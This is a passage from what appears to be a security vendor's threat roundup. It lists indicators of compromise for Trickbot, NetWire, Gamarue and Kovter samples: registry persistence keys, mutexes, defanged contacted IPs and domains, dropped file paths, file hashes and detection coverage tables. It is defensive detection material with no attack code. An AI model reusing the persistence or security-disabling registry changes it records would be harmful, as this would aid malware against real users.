\n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: AppInit_DLLs ` | 25 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\APPLIC~1\\Mozilla\\kvlcuie.dll` | 21 \n`%HOMEPATH%\\APPLIC~1\\Mozilla\\tfbkpde.exe` | 21 \n`%SystemRoot%\\Tasks\\kylaxsk.job` | 21 \n`%System32%\\Tasks\\aybbmte` | 25 \n`%ProgramData%\\Mozilla\\thfirxd.exe` | 25 \n`%ProgramData%\\Mozilla\\lygbwac.dll` | 25 \n \n#### File Hashes\n\n` 083229d33405150930a1d1cb416882532138571c5dc659afc9cd80c8770e62b8 0c3bd17a29727331d9381f47943c6950b9a01828a1f6337ba17ced510616fff6 156d95f97c320ce13dbbd675c1240447f207096eab813f0ca852c5bec63ee3b5 172985bcfe276d18762f3a0ac551d15f49885e956478bfcc08cf5524d326ea25 1965ff8d288665c76396b6029aeb1337972735a4610ba879cf7bd407fb2a8827 27fdacd8808b754d66dfafbff9e4fc2173a799a94c5251117fe17f3af1428c06 3dc7b1cc278e41b56b9cf23e4fc10a74ac2c62867beebdacaecb6ba8103f2679 3eb746e6a92be3a38280129157597eccdffa14b881667c4d42167d0fee7e9c36 41dbab1de30bba1ae12cd63c2fccee455f6ac304e8d8909b1e9a9c4df4894620 4e07f974bcd096ee7e4db358855054bad5de2d9f0ec7ab3e3ed4151a3be2f95c 59e9dfc13476d28583402405e503be73e433d16888c2485956634751b9ce525b 5a93627200929bd11b532a8ff6e1df06467af81e80a4aa967873c80cb7ed7c73 5ce641289dee052cf18a3b76b25d77a6fdfa11b794048d86ef31f32889cc8da5 633d2684a78baf37a289ba913060b65c06d47dbe96c91b79cfbf9042cf8353a5 67d7bd9279e73e5563afe27e0145ca66df510167af85cc56fe4172fb6da6f838 79e2d39c6357dc3a3b057f05d0f53bdbaf1e51db61dfde985bee7bc1e05ed33c 7b344ba74f11fe719b8321da501d86598ab43fdf6a662ee1aafe6cd829add6e1 7ceaa69cbffcffefdea99f110c7b031439b0ea8d9caa7f475f117c975989f65b 834fc5e70088fac0e7df245b20ca3319d692763ff28b6407e835cd38a8a4403b 84d61f9eecf8973c0f9815faaff6b676857d0c0065e584b48ba31f8985923317 87db422f9fdc1a6266e78fcf69d9339f5dd2a55288ccf35ad3239da5a6a22d0e 8c43aafc29a44c7b54f5b228961737018b65c949288e170c598810505658cac5 8c754e7edf8a2aecb6d3fec2cbe7e07135fc74beb7aed0e7f3544cdc67266c44 94211619fcc8304b7dabd5d683ee525774c3d9ac34ec7809da2ae27eeb62c49a a181e02fe416d5b81c24f4d046304f94da88252312befb623ae2c490cfa3e0d7 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-d6qrZYoKCdk/Xkbj_ntjiSI/AAAAAAAADSI/CW39wdcfw1s6Ko2RCER-1zBgGJIzq9YvQCLcBGAsYHQ/s1600/a181e02fe416d5b81c24f4d046304f94da88252312befb623ae2c490cfa3e0d7_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Trickbot-7582953-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\75E0ABB6138512271C04F85FDDDE38E4B7242EFE \nValue Name: Blob ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 29 \n`Global\\785161C887210` | 25 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`216[.]239[.]32[.]21` | 1 \n`216[.]239[.]34[.]21` | 3 \n`216[.]239[.]36[.]21` | 2 \n`216[.]239[.]38[.]21` | 1 \n`104[.]20[.]17[.]242` | 1 \n`116[.]203[.]16[.]95` | 4 \n`50[.]19[.]116[.]122` | 1 \n`69[.]195[.]159[.]158` | 1 \n`190[.]214[.]13[.]2` | 14 \n`181[.]112[.]157[.]42` | 1 \n`181[.]113[.]28[.]146` | 1 \n`181[.]140[.]173[.]186` | 16 \n`119[.]252[.]165[.]75` | 1 \n`45[.]125[.]1[.]34` | 2 \n`54[.]235[.]203[.]7` | 1 \n`23[.]21[.]50[.]37` | 1 \n`198[.]8[.]91[.]10` | 3 \n`121[.]100[.]19[.]18` | 1 \n`171[.]100[.]142[.]238` | 1 \n`82[.]146[.]62[.]52` | 2 \n`5[.]182[.]210[.]246` | 2 \n`5[.]182[.]210[.]226` | 3 \n`51[.]89[.]115[.]116` | 5 \n`85[.]204[.]116[.]237` | 6 \n`93[.]189[.]42[.]146` | 7 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]myexternalip[.]com` | 1 \n`myexternalip[.]com` | 3 \n`icanhazip[.]com` | 1 \n`ip[.]anysrc[.]net` | 4 \n`api[.]ip[.]sb` | 2 \n`ipecho[.]net` | 2 \n`wtfismyip[.]com` | 1 \n`api[.]ipify[.]org` | 3 \n`ipinfo[.]io` | 2 \n`252[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 9 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\windirect` | 29 \n`%APPDATA%\\windirect\\settings.ini` | 29 \n`%APPDATA%\\windirect\\data` | 29 \n`%System32%\\Tasks\\Windows Direct core tools` | 29 \n`%SystemRoot%\\Tasks\\Windows Direct core tools.job` | 25 \n`%APPDATA%\\windirect\\bc434c1a3bd87c0cb40c31a3caac7831.exe` | 1 \n`%APPDATA%\\windirect\\7a2bd7d2423c2c83b3bc987c22da348c.exe` | 1 \n`%APPDATA%\\windirect\\a073a92c82bdad2dbdcba4bd1b322bdc.exe` | 1 \n`%APPDATA%\\windirect\\7baba02278378b0d739b212389d20c2c.exe` | 1 \n`%APPDATA%\\WINDIRECT\\<original file name>.exe` | 25 \n \n#### File Hashes\n\n` 007e9d94f91258cdc60ba3fd7df1ed56b00c7c08ecff19c484343ce95978c096 068f1532a0c7e9f564e92f9b093f4cf4a534ef9aa6ee0e6ec6b992beba9404f1 09edeec6283a7986081aeaa4715321a383d675dbfbd2486d01b7e5c9fd81dfc6 0a324fcc5e761067096e9f2161ce3da69c0836972cda72e8740532cc7e84866a 0b19441ced2510b94d977feac51406e3e2a9b9b68f6e8df7a8710c9df29ec8d9 0fe8b3586aa6098767690b4ee1b1fbb39d047fcd7a929d2726f634365eacc6a8 13a865d3702b86db5c13bf6190a03da070ca23c094f8d3c2818ef788655b695b 14fa94928f23ccdb90400c7628327649543d9fd9dae6e963b8c1d96e0ebf7699 184c8d777fe98828143da4f2d762d094475a5eaa9018f77a97e8aad7d5cc696d 1ee8f3dec5556746589f417e1553a7c5f63eca1bab55d5ec95a96feb5ceb7c20 24ce27efe076795d16b9530988cf7b66df89b1f5e1c170a43c509f19b7ca1f94 2870225c01ab904fc4c9a1c7130c88dc4269cb34ff1d3aa3a225d1a9ff53f6ac 29346d7f7895e449a9b09135e2c05deddfddbe9db62db4eb8d33f8f458b13e7a 2b30cd5e49572f0ec94855d7d64ebb4ccfb89c0e2ce0804010a36b892a0e2d3d 2bab0171d0bcbb1be86ef7ea26aa76a10155978a84c08214b156e837a024372a 34e46ae12096f2a6f3aa9ccc9d59cb94ff0ef151da405f056f43b3b2eb9781b5 3c4bad8514148748ac20c348ad75e47633ee2723db56fb993503719390eeca75 3d9acac16267698fb1f3ac47d0d05a2dda4c4758e9b36c9e1644f89e041556ba 42a29cd7a6ce5a5f864a99968f85e7cb4b8d22383b7e194cfd0d558e463c7b70 46cad7db43d81067d78055680a8434ccf1090e3afbc52654ba4dd905038c7a9a 492425d2ab26c3d88845c3d3ee8c13cd7bef8fc893ec71f61881bd1cde33f358 499a4b0530fcff51c3f8703e727ba8fee36c19229be9a650cd5b7dad1d184a79 4cca83ef698b44352c95dc6b05dbaa1eca0521454179932bb4d8094c01133bfb 4d2be228e84f31aade8e7be4c37e05921e3f94297b2a45fe7fa2ca61d5e8dfbd 4d678fc86bacc1f3c53f7b96c814710a5029306be44a90d32c482719ff308b45 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-hoGu7FGpsQo/XkbkN2mLU2I/AAAAAAAADSM/oZbkfOhd1rAp7EtlUP7a9Znu0opqCjgKACLcBGAsYHQ/s1600/2870225c01ab904fc4c9a1c7130c88dc4269cb34ff1d3aa3a225d1a9ff53f6ac_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-FN8MIbTAUL4/XkbkRiFG4_I/AAAAAAAADSU/zw7YKnWdnf0WTlI6755e2LX-ngnp1d1TwCLcBGAsYHQ/s1600/2870225c01ab904fc4c9a1c7130c88dc4269cb34ff1d3aa3a225d1a9ff53f6ac_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.NetWire-7578556-0\n\n#### Indicators of Compromise\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`88[.]198[.]117[.]83` | 25 \n \n#### File Hashes\n\n` 05848831206819b63dabd2116e673d28de675e62cf7d858fa4764bfc7a1e9b40 1504dfb0c30dd51fed5c8940d5103479ae565fba3d839f7d973925fa868a6097 17e436f6312f5cb021419beabb8985272593995ccc09110f27abfee1d1eed74e 18bb29e7f9fcc8410d0e613a4989d47b5f1b38023c26bb95a4fe5ae53c2f52ff 1a996582f6a9e60acc72d4266067c9e5ff48ac32bdb45fc8787cc366ff4bd790 27540988f360e65aa1ca42007c551fb73ab1b36ed5408ff098389b6ce3ac0f94 27fb4531c6056a49b297b20a24eafaceabb954aeb24dc00813e85884e2d0a5ce 2ace0152ad8eb298bcae92ebcf3c27c09ed25620c59642be684886bffee56ccb 3c1c1ccf871e10907e69945363ada929b5841d4d192a8422745c47731d33bcfd 3efa7242e48e0be611c350de170776f8537fec4e7c0105ec86e44a18e95db367 46988782ad1012c66e2de02140c2f5d4f210916b0ace64d5c29018336ba76668 4b8c0fcde33aedb55f6e087fd9526699f188f3e3030e33bd04cd8785b748ebe1 4e9562ec338b3e4dbaca5f30289881689f5e4ca5ef7fffb4afe73abe040213b2 5609f2f063ee870c77bfb1e2912d7d5080f85755e069a67c94a6258bebe5f367 5f446e1da31fd31ec83cb6fa2b26da3ae2821ca60273152079736006f498841e 610007b784ce5e7ffa2a2e646e60c72277a0222b2f18fb74eed55d25f1af37dc 6253c1a4ebbfba5de561219996ddc45af59f4ca3b35a3f95354f5ae91c78bbe0 68a0b82d1b3a21dcbd78de0bdb31f69e4afdb4c20750929d9959af168aa4457d 74a0bc89f2667f79264105d44c751d625fbc53ce5a12771134b9c32ca9e916c9 74b44c73bf6f45344bb4aef9f469b3ca92b76b6c0e479e126cab0e35f679c9ca 7caee05382db7f0819893217db61a70cb249d1de1530fedf80e56a9fabc445d6 7e00eca478b68881e4722e2aba2094e468b4b457515d4b8e247b624189ecfc65 8851b44b9e92689115050278bef0261926ecda761a19a566a73fa29de08bad69 89c33a22731e48e90417e2877e318c86a7ac57b5d9ba4c9a39bc65bf27191935 8a9130af590f32b807270517b61af5dbff8f3bc1e2114648f764d8180c22d5c2 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-komG9sMxszw/XkbkeNevidI/AAAAAAAADSc/kg9MJFg4Od4ZtqllEEqpWqFwGxDCzlNCgCLcBGAsYHQ/s1600/8a9130af590f32b807270517b61af5dbff8f3bc1e2114648f764d8180c22d5c2_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Gamarue-7580018-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: ShowSuperHidden ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: Load ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 1081297374 ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: 1081297374 ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLUA ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Start ` | 9 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: HideSCAHealth ` | 9 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: HideSCAHealth ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WUAUSERV \nValue Name: Start ` | 9 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: TaskbarNoNotification ` | 9 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: TaskbarNoNotification ` | 9 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Sidebars ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: twunk_16.exe ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: Taskman ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: Shell ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Update Manager ` | 1 \n`<HKCU>\\SOFTWARE\\WINRAR \nValue Name: HWID ` | 1 \n`<HKCU>\\SOFTWARE\\WINRAR ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\MODULES ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\MODULES \nValue Name: Number ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\NOTEPAD \nValue Name: Body ` | 1 \nMutexes | Occurrences \n---|--- \n`alFSVWJB` | 2 \n`PuredairyBB9` | 1 \n`PuredairyBB10` | 1 \n`PuredairyBB2` | 1 \n`PuredairyBB4` | 1 \n`PuredairyBB8` | 1 \n`PuredairyBB7` | 1 \n`PuredairyBB6` | 1 \n`PuredairyBB15` | 1 \n`PuredairyBB14` | 1 \n`PuredairyBB13` | 1 \n`PuredairyBB12` | 1 \n`PSPSndkvsdvd0199201` | 1 \n`PuredairyBB1` | 1 \n`PuredairyBB5` | 1 \n`PuredairyBB3` | 1 \n`PuredairyBB16` | 1 \n`PuredairyBB17` | 1 \n`PuredairyBB18` | 1 \n`PuredairyBB22` | 1 \n`PuredairyBB20` | 1 \n`PuredairyBB21` | 1 \n`PuredairyBB19` | 1 \n`PuredairyBB29` | 1 \n`PuredairyBB31` | 1 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`195[.]22[.]26[.]248` | 2 \n`23[.]253[.]126[.]58` | 2 \n`184[.]105[.]192[.]2` | 6 \n`104[.]239[.]157[.]210` | 2 \n`104[.]42[.]225[.]122` | 8 \n`40[.]90[.]247[.]210` | 5 \n`40[.]91[.]124[.]111` | 4 \n`20[.]45[.]1[.]107` | 9 \n`109[.]120[.]180[.]29` | 2 \n`94[.]102[.]52[.]19` | 1 \n`217[.]23[.]8[.]142` | 1 \n`109[.]236[.]86[.]119` | 1 \n`93[.]190[.]140[.]141` | 1 \n`108[.]59[.]2[.]221` | 1 \n`109[.]236[.]83[.]12` | 1 \n`80[.]82[.]65[.]207` | 1 \n`217[.]23[.]3[.]105` | 1 \n`217[.]23[.]4[.]220` | 1 \n`93[.]190[.]140[.]113` | 1 \n`217[.]23[.]9[.]104` | 1 \n`93[.]190[.]142[.]191` | 1 \n`94[.]102[.]51[.]231` | 1 \n`217[.]23[.]7[.]3` | 1 \n`80[.]82[.]65[.]199` | 1 \n`109[.]236[.]86[.]27` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`europe[.]pool[.]ntp[.]org` | 9 \n`www[.]update[.]microsoft[.]com[.]nsatc[.]net` | 9 \n`and10[.]uzuzuseubumaandro[.]com` | 1 \n`powerrembo[.]ru` | 2 \n`and4[.]junglebeariwtc1[.]com` | 1 \n`faumoussuperstars[.]ru` | 2 \n`martivitapoint[.]info` | 1 \n`and10[.]uzuzuseubumaandro1[.]com` | 1 \n`spotxte[.]com` | 1 \n`nutqauytva8azxd[.]com` | 2 \n`nutqauytva100azxd[.]com` | 2 \n`nutqauytva2azxd[.]com` | 2 \n`nutqauytva10azxd[.]com` | 2 \n`nutqauytva6azxd[.]com` | 2 \n`nutqauytva11azxd[.]com` | 2 \n`nutqauytva3azxd[.]com` | 2 \n`nutqauytva9azxd[.]com` | 2 \n`nutqauytva7azxd[.]com` | 2 \n`nutqauytva5azxd[.]com` | 2 \n`nutqauytva4azxd[.]com` | 2 \n`109[.]120[.]180[.]29` | 1 \n`vedivenivici[.]ml` | 2 \n`delvernet[.]info` | 2 \n`otter[.]pw` | 2 \n`oingee[.]pw` | 2 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`\\Documents and Settings\\All Users\\mslkrru.exe` | 9 \n`%APPDATA%\\WindowsUpdate` | 1 \n`\\RECYCLER` | 7 \n`\\RECYCLER\\S-1-5-21-0243556031-888888379-781862338-18611771` | 5 \n`\\TEMP\\C\\UPDATE` | 1 \n`%APPDATA%\\WindowsUpdate\\MSupdate.exe` | 1 \n`%APPDATA%\\alFSVWJB` | 2 \n`%ProgramData%\\msodtyzm.exe` | 11 \n`\\RECYCLER\\S-1-5-21-0243556031-888888379-781862338-1861771` | 2 \n`%ProgramData%\\~` | 11 \n`%APPDATA%\\alFSVWJB\\twunk_16.exe` | 1 \n`%APPDATA%\\winamfes.exe` | 2 \n`%APPDATA%\\alFSVWJB\\splwow64.exe` | 1 \n`%TEMP%\\-1631195624.bat` | 1 \n`%TEMP%\\115828.bat` | 1 \n`%APPDATA%\\alFSVWJB\\winhlp32.exe` | 1 \n \n#### File Hashes\n\n` 0e6f120bd1607731a34778c8d2f3a038414dd3d263ca25c5e5941558ece492ca 1237cef1686205e9854f84be62f474247279e72dedc0b5e871b7c07c9c5126e4 1d453682f2771631919717c54b95b6e90a1e4231c9c503ef4b5fa302e247d314 1f7c808b0fb82df3a2e27e4819224d176f1be5dca98752ca0545591e740112e6 20ba9da6df29a870a6826425b23b7508606bdaad662f0238da378091ed1067ef 2324b414e6300fab1abdc2d1e5bb128544c94419dcc6656b105bc69865480d88 36b578d5abac82fd7db98a77869112dbf7e0bfa8433febca08b1c16370f68a2f 3887f3a97e906d5bd9d94ba1117953c46ba0dd1cd5fbae4653f4cd1924ae258e 5f4293450ad2aca70c70bdc55bfa2db00bc500b73000814a9b995f940c4e8c41 68b13c4a8a9fe01bf0567627d099b1a6cb98eef7bd4762bbee5420efbcc8a470 693086bd9b704e5927f76f40a8b04136b1f7d94a482a9020126819a407d24aa8 6edddbf48f261ae99c5a7dfd3fc2c443a3674f68ca3076b391c89e7023dc4c54 70c203465f54113975e075563cf824ba3632a3227eddd38c651b8f5a58cf2bae 7b3c8d5208b4c9e1747e670c67d44a581c68e299a486eba6d7f96cbe527e6855 7b3efe2cf5dc30bf2329986bdcd680f4195a8f750f507e96a3395d8a4a9310fb 82687cd40932329348005bb61782e5b5493faae26389d7a3300e5ba40af04dce 87892d4d4693dc87d4195a0aa30bba294841580f2a4c81948c37018b69dc69d8 966eac6b067db2163c8e82669373c17ea335fff18280f848e6b8202e00a905d2 98788fbe094bd1260aaa7120fa02cf183ab09f7a32c0a4cba68074316c276ce6 aa6eea166b8cffd5763b79f47f6f8cbeea328a056e7a0152ceb104cc59c1e320 bec5979b7d191703cbce4a4c88171b89ab97b07fba0e0dd001ffe8dee9689049 d3f847257945d883bc02431f7561d661b56b7177941b5d7451528bdfc28b4ca6 d6f2570910b38e15acb876ced00d7f877fa9ded01a15c3e07710319a50adf8cb d7f4e9cab07e8c2826ee70b6a45d51b18892cfa5d4a92ce318c43eed2399fe54 da93ffcafad1569fd94cb5bae72a876bf6e021b7ad30b4d644a99ceb88651bc6 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-essWD6jQn98/XkbkvQMAvWI/AAAAAAAADSo/bh8oOsTllLUEQwUn1IophA4XDimJYhOyACLcBGAsYHQ/s1600/5f4293450ad2aca70c70bdc55bfa2db00bc500b73000814a9b995f940c4e8c41_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-XUwmAjmy9ew/XkbkzJwdRGI/AAAAAAAADSs/xPUmGpebw9w7DDIYT8tr5woLymKe-hbrQCLcBGAsYHQ/s1600/5f4293450ad2aca70c70bdc55bfa2db00bc500b73000814a9b995f940c4e8c41_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-pnZSPvSBJmk/Xkbk33ih9QI/AAAAAAAADSw/bO3pg221ueYN8fpJxUqsIARE5fAeurJjACLcBGAsYHQ/s1600/1237cef1686205e9854f84be62f474247279e72dedc0b5e871b7c07c9c5126e4_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.Kovter-7581113-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE \nValue Name: DisableOSUpgrade ` | 15 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE\\OSUPGRADE \nValue Name: ReservationsAllowed ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: 656f27d6 ` | 15 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: 656f27d6 ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: 96f717b3 ` | 15 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: 96f717b3 ` | 15 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE ` | 15 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 ` | 15 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE\\OSUPGRADE ` | 15 \n`<HKCR>\\.8CA9D7 ` | 15 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: eed5bf47 ` | 15 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: edfc5b63 ` | 15 \n`<HKCR>\\C3B61 ` | 15 \n`<HKCR>\\C3B61\\SHELL ` | 15 \n`<HKCR>\\C3B61\\SHELL\\OPEN ` | 15 \n`<HKCR>\\C3B61\\SHELL\\OPEN\\COMMAND ` | 15 \n`<HKCR>\\.8CA9D7 ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: ffcfae7b ` | 15 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: ffcfae7b ` | 15 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: 78758f10 ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: 78758f10 ` | 15 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: c3ab6058 ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: c3ab6058 ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 8567f942 ` | 15 \nMutexes | Occurrences \n---|--- \n`EA4EC370D1E573DA` | 15 \n`A83BAA13F950654C` | 15 \n`Global\\7A7146875A8CDE1E` | 15 \n`B3E8F6F86CDD9D8B` | 15 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`162[.]59[.]22[.]216` | 1 \n`203[.]220[.]231[.]209` | 1 \n`35[.]30[.]2[.]211` | 1 \n`65[.]168[.]33[.]91` | 1 \n`65[.]23[.]68[.]193` | 1 \n`8[.]111[.]224[.]146` | 1 \n`190[.]95[.]112[.]80` | 1 \n`17[.]163[.]64[.]9` | 1 \n`75[.]177[.]69[.]90` | 1 \n`166[.]105[.]213[.]36` | 1 \n`214[.]63[.]237[.]80` | 1 \n`36[.]91[.]76[.]70` | 1 \n`106[.]70[.]177[.]221` | 1 \n`16[.]191[.]214[.]15` | 1 \n`58[.]13[.]27[.]49` | 1 \n`192[.]86[.]250[.]64` | 1 \n`126[.]167[.]218[.]58` | 1 \n`15[.]150[.]185[.]79` | 1 \n`136[.]59[.]133[.]35` | 1 \n`14[.]24[.]198[.]67` | 1 \n`60[.]255[.]136[.]37` | 1 \n`35[.]118[.]226[.]214` | 1 \n`39[.]29[.]235[.]49` | 1 \n`154[.]111[.]27[.]104` | 1 \n`166[.]82[.]242[.]42` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]litespeedtech[.]com` | 1 \n`schema[.]org` | 1 \n`api[.]w[.]org` | 1 \n`gmpg[.]org` | 1 \n`pinterest[.]com` | 1 \n`httpd[.]apache[.]org` | 1 \n`bugs[.]debian[.]org` | 1 \n`www[.]anrdoezrs[.]net` | 1 \n`shareasale[.]com` | 1 \n`help[.]smartertools[.]com` | 1 \n`www[.]smartertools[.]com` | 1 \n`www[.]pntrs[.]com` | 1 \n`cdn10[.]bigcommerce[.]com` | 1 \n`cowgirldelight[.]com` | 1 \n`lppool[.]catalogsites[.]net` | 1 \n`www[.]rods[.]com` | 1 \n`checkspressions[.]com` | 1 \n`www[.]womensbootshop[.]com` | 1 \n`www[.]cssigniter[.]com` | 1 \n`passets-cdn[.]pinterest[.]com` | 1 \n`www[.]pntra[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%LOCALAPPDATA%\\4dd3c` | 15 \n`%LOCALAPPDATA%\\4dd3c\\519d0.bat` | 15 \n`%LOCALAPPDATA%\\4dd3c\\8e986.8ca9d7` | 15 \n`%LOCALAPPDATA%\\4dd3c\\d95ad.lnk` | 15 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\91b4e.lnk` | 15 \n`%APPDATA%\\b08d6` | 15 \n`%APPDATA%\\b08d6\\0b3c0.8ca9d7` | 15 \n \n#### File Hashes\n\n` 0bc765c9bdad7dea5fee981fa1ea3e39d39b43110991be6767062b5b3e04f72c 127fb45d6030c7ccccee832b5ce576786dbaae5df9b56894b69257e5217e294a 2ae6974b7efe312d521686e6852eeb699f2a73775742736b85b597e0ef3aa431 2fc52ad46802099597893005722950b74ac8625908227d1127a00666c4b335b9 30814d58a34c1f93bca33a91dff01df3d51d79652e03ee1d4268d4f3731c32e2 